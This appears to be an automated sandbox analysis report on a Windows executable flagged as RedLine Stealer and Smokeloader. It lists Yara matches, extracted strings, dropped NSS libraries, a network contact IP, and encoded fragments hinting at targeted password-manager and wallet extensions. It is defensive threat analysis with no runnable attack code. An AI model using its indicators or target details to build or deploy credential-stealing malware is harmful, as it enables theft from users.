Source: T220UXIoKO.exe, 00000000.00000002.2933833911.0000000000400000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Ed1aWxkV
Source: T220UXIoKO.exe, 00000000.00000002.2933833911.000000000045A000.00000040.00000001.01000000.00000003.sdmp, T220UXIoKO.exe, 00000000.00000003.1740576000.0000000020D91000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: T220UXIoKO.exe, 00000000.00000002.2933833911.000000000045A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17WdsYWhtbmRlZHwxfDB8MHxab2hvIF
Source: T220UXIoKO.exe, 00000000.00000002.2933833911.000000000045A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17crosoft
Source: T220UXIoKO.exe, 00000000.00000002.2933833911.000000000045A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17mluIFdhbGxldHxmbmpobWtoaG1rYm
Source: T220UXIoKO.exe, 00000000.00000002.2934433959.0000000000971000.00000004.00000020.00020000.00000000.sdmp, JDAKJDAAFBKFHIEBFCFB.0.dr String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: T220UXIoKO.exe, 00000000.00000003.1746233514.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, JDAKJDAA.0.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: T220UXIoKO.exe, 00000000.00000002.2934433959.0000000000971000.00000004.00000020.00020000.00000000.sdmp, JDAKJDAAFBKFHIEBFCFB.0.dr String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: T220UXIoKO.exe, 00000000.00000003.1746233514.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, JDAKJDAA.0.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: AAKKECFBGIIIEBGDGDAKJKKKEB.0.dr String found in binary or memory: https://www.mozilla.org
Source: T220UXIoKO.exe, 00000000.00000002.2933833911.000000000045A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: AAKKECFBGIIIEBGDGDAKJKKKEB.0.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: T220UXIoKO.exe, 00000000.00000002.2933833911.000000000045A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: AAKKECFBGIIIEBGDGDAKJKKKEB.0.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: T220UXIoKO.exe, 00000000.00000002.2933833911.000000000045A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: T220UXIoKO.exe, 00000000.00000003.1815951683.00000000270EC000.00000004.00000020.00020000.00000000.sdmp, AAKKECFBGIIIEBGDGDAKJKKKEB.0.dr String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: T220UXIoKO.exe, 00000000.00000002.2933833911.000000000045A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/ZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBM
Source: T220UXIoKO.exe, 00000000.00000002.2933833911.000000000045A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/lvYnwxfDB8MHxMYXN0UGFzc3xoZG9raWVqbnBpbWFrZWRoYWpoZGxj
Source: AAKKECFBGIIIEBGDGDAKJKKKEB.0.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: T220UXIoKO.exe, 00000000.00000002.2933833911.000000000045A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: T220UXIoKO.exe, 00000000.00000003.1815951683.00000000270EC000.00000004.00000020.00020000.00000000.sdmp, AAKKECFBGIIIEBGDGDAKJKKKEB.0.dr String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown HTTPS traffic detected: 185.98.131.200:443 -> 192.168.2.4:49731 version: TLS 1.2

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 00000000.00000002.2934288445.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.2934347582.0000000000830000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
PE file contains section with special chars
Source: JDAKJDAAFB.exe.0.dr Static PE information: section name:
Source: JDAKJDAAFB.exe.0.dr Static PE information: section name:
Source: JDAKJDAAFB.exe.0.dr Static PE information: section name:
Source: JDAKJDAAFB.exe.0.dr Static PE information: section name:
Source: JDAKJDAAFB.exe.0.dr Static PE information: section name:
Source: JDAKJDAAFB.exe.0.dr Static PE information: section name:
Source: JDAKJDAAFB.exe.0.dr Static PE information: section name:
Source: JDAKJDAAFB.exe.0.dr Static PE information: section name:
Contains functionality to call native functions
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C6EED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset, 0_2_6C6EED10
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C72B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C72B700
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C72B8C0 rand_s,NtQueryVirtualMemory, 0_2_6C72B8C0
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C72B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 0_2_6C72B910
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C6CF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C6CF280
Detected potential crypto function
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_0042D1F0 0_2_0042D1F0
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_0042CE98 0_2_0042CE98
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_004336A4 0_2_004336A4
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C6C35A0 0_2_6C6C35A0
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C6D5440 0_2_6C6D5440
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C73545C 0_2_6C73545C
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C73542B 0_2_6C73542B
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C705C10 0_2_6C705C10
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C712C10 0_2_6C712C10
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C73AC00 0_2_6C73AC00
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C706CF0 0_2_6C706CF0
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C6CD4E0 0_2_6C6CD4E0
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C6D64C0 0_2_6C6D64C0
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C6ED4D0 0_2_6C6ED4D0
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C7234A0 0_2_6C7234A0
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C72C4A0 0_2_6C72C4A0
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C6D6C80 0_2_6C6D6C80
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C6DFD00 0_2_6C6DFD00
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C6F0512 0_2_6C6F0512
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C6EED10 0_2_6C6EED10
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C7285F0 0_2_6C7285F0
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C700DD0 0_2_6C700DD0
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C736E63 0_2_6C736E63
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C6CC670 0_2_6C6CC670
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C703E50 0_2_6C703E50
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C6E4640 0_2_6C6E4640
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C6E9E50 0_2_6C6E9E50
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C712E4E 0_2_6C712E4E
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C729E30 0_2_6C729E30
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C707E10 0_2_6C707E10
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C715600 0_2_6C715600
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C7376E3 0_2_6C7376E3
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C6CBEF0 0_2_6C6CBEF0
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C6DFEF0 0_2_6C6DFEF0
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C724EA0 0_2_6C724EA0
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C72E680 0_2_6C72E680
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C6E5E90 0_2_6C6E5E90
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C707710 0_2_6C707710
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C6D9F00 0_2_6C6D9F00
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C6CDFE0 0_2_6C6CDFE0
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C6F6FF0 0_2_6C6F6FF0
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C7177A0 0_2_6C7177A0
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C70F070 0_2_6C70F070
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C6E8850 0_2_6C6E8850
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C6ED850 0_2_6C6ED850
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C70B820 0_2_6C70B820
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C714820 0_2_6C714820
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C6D7810 0_2_6C6D7810
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C6EC0E0 0_2_6C6EC0E0
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C7058E0 0_2_6C7058E0
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C7350C7 0_2_6C7350C7
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C6F60A0 0_2_6C6F60A0
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C71B970 0_2_6C71B970
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C73B170 0_2_6C73B170
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C6DD960 0_2_6C6DD960
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C6EA940 0_2_6C6EA940
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C6CC9A0 0_2_6C6CC9A0
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C6FD9B0 0_2_6C6FD9B0
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C705190 0_2_6C705190
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C722990 0_2_6C722990
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C709A60 0_2_6C709A60
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C70E2F0 0_2_6C70E2F0
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C6E1AF0 0_2_6C6E1AF0
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C708AC0 0_2_6C708AC0
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C732AB0 0_2_6C732AB0
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C6C22A0 0_2_6C6C22A0
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C6F4AA0 0_2_6C6F4AA0
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C6DCAB0 0_2_6C6DCAB0
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C73BA90 0_2_6C73BA90
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C6DC370 0_2_6C6DC370
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C6C5340 0_2_6C6C5340
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C70D320 0_2_6C70D320
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C7353C8 0_2_6C7353C8
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C6CF380 0_2_6C6CF380
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C77AC60 0_2_6C77AC60
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C836C00 0_2_6C836C00
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C7CECD0 0_2_6C7CECD0
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C84AC30 0_2_6C84AC30
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C76ECC0 0_2_6C76ECC0
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C806D90 0_2_6C806D90
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C8FCDC0 0_2_6C8FCDC0
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C8F8D20 0_2_6C8F8D20
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C774DB0 0_2_6C774DB0
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C89AD50 0_2_6C89AD50
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C83ED70 0_2_6C83ED70
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C810EC0 0_2_6C810EC0
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C850E20 0_2_6C850E20
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C77AEC0 0_2_6C77AEC0
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C7F6E90 0_2_6C7F6E90
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C80EE70 0_2_6C80EE70
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C8B8FB0 0_2_6C8B8FB0
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C7DEF40 0_2_6C7DEF40
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C776F10 0_2_6C776F10
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C84EFF0 0_2_6C84EFF0
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C770FE0 0_2_6C770FE0
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C8B0F20 0_2_6C8B0F20
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C77EFB0 0_2_6C77EFB0
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C832F70 0_2_6C832F70
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: String function: 6C8F09D0 appears 51 times
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: String function: 6C7094D0 appears 90 times
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: String function: 004045C0 appears 317 times
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: String function: 6C6FCBE8 appears 134 times
PE file contains more sections than normal
Source: JDAKJDAAFB.exe.0.dr Static PE information: Number of sections : 14 > 10
PE file overlay found
Source: JDAKJDAAFB.exe.0.dr Static PE information: Data appended to the last section found
Sample file is different than original file name gathered from version info
Source: T220UXIoKO.exe, 00000000.00000002.2955749492.000000006C752000.00000002.00000001.01000000.00000008.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs T220UXIoKO.exe
Source: T220UXIoKO.exe, 00000000.00000002.2956086813.000000006C945000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs T220UXIoKO.exe
Uses 32bit PE files
Source: T220UXIoKO.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 00000000.00000002.2934288445.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.2934347582.0000000000830000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: T220UXIoKO.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: JDAKJDAAFB.exe.0.dr Static PE information: Section: ZLIB complexity 0.9921833923376213
Source: JDAKJDAAFB.exe.0.dr Static PE information: Section: ZLIB complexity 1.0022513303315597
Source: JDAKJDAAFB.exe.0.dr Static PE information: Section: ZLIB complexity 1.0416666666666667
Source: JDAKJDAAFB.exe.0.dr Static PE information: Section: ZLIB complexity 1.5
Source: JDAKJDAAFB.exe.0.dr Static PE information: Section: ZLIB complexity 2.3333333333333335
Source: JDAKJDAAFB.exe.0.dr Static PE information: Section: ZLIB complexity 1.030054644808743
Source: JDAKJDAAFB.exe.0.dr Static PE information: Section: ZLIB complexity 1.1047619047619048
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@1/23@1/2
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C727030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 0_2_6C727030
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_00419600
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_00413720 CoCreateInstance,MultiByteToWideChar,lstrcpyn, 0_2_00413720
Source: C:\Users\user\Desktop\T220UXIoKO.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\PB295ZQ4.htm Jump to behavior
Source: T220UXIoKO.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\T220UXIoKO.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: T220UXIoKO.exe, 00000000.00000002.2945995098.000000001AE02000.00000004.00000020.00020000.00000000.sdmp, T220UXIoKO.exe, 00000000.00000002.2955470518.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, T220UXIoKO.exe, 00000000.00000002.2955941809.000000006C8FF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: T220UXIoKO.exe, 00000000.00000002.2945995098.000000001AE02000.00000004.00000020.00020000.00000000.sdmp, T220UXIoKO.exe, 00000000.00000002.2955470518.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, T220UXIoKO.exe, 00000000.00000002.2955941809.000000006C8FF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: T220UXIoKO.exe, 00000000.00000002.2945995098.000000001AE02000.00000004.00000020.00020000.00000000.sdmp, T220UXIoKO.exe, 00000000.00000002.2955470518.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, T220UXIoKO.exe, 00000000.00000002.2955941809.000000006C8FF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: T220UXIoKO.exe, 00000000.00000002.2945995098.000000001AE02000.00000004.00000020.00020000.00000000.sdmp, T220UXIoKO.exe, 00000000.00000002.2955470518.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, T220UXIoKO.exe, 00000000.00000002.2955941809.000000006C8FF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: T220UXIoKO.exe, T220UXIoKO.exe, 00000000.00000002.2945995098.000000001AE02000.00000004.00000020.00020000.00000000.sdmp, T220UXIoKO.exe, 00000000.00000002.2955470518.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, T220UXIoKO.exe, 00000000.00000002.2955941809.000000006C8FF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: T220UXIoKO.exe, 00000000.00000002.2945995098.000000001AE02000.00000004.00000020.00020000.00000000.sdmp, T220UXIoKO.exe, 00000000.00000002.2955470518.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: T220UXIoKO.exe, 00000000.00000002.2945995098.000000001AE02000.00000004.00000020.00020000.00000000.sdmp, T220UXIoKO.exe, 00000000.00000002.2955470518.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, T220UXIoKO.exe, 00000000.00000002.2955941809.000000006C8FF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: T220UXIoKO.exe, 00000000.00000003.1745770495.0000000020D89000.00000004.00000020.00020000.00000000.sdmp, KFCAFIIDHIDGHIECGDGI.0.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: T220UXIoKO.exe, 00000000.00000002.2945995098.000000001AE02000.00000004.00000020.00020000.00000000.sdmp, T220UXIoKO.exe, 00000000.00000002.2955470518.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: T220UXIoKO.exe, 00000000.00000002.2945995098.000000001AE02000.00000004.00000020.00020000.00000000.sdmp, T220UXIoKO.exe, 00000000.00000002.2955470518.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: T220UXIoKO.exe String found in binary or memory: ft.com/en-us/office/examples-of-office-product-keys-7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us https://support.microsoft.com/en-us/topic/install-the-english-language-pack-for-32-bit-office-94ba2e0b-638e-4a92-8857-2cb5ac1d
Source: T220UXIoKO.exe String found in binary or memory: m/en-us/office/examples-of-office-product-keys-7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us https://support.microsoft.com/en-us/topic/install-the-english-language-pack-for-32-bit-office-94ba2e0b-638e-4a92-8857-2cb5ac1d8e17?
Source: C:\Users\user\Desktop\T220UXIoKO.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe Section loaded: msvcr100.dll Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe Section loaded: wininet.dll Jump to behavior
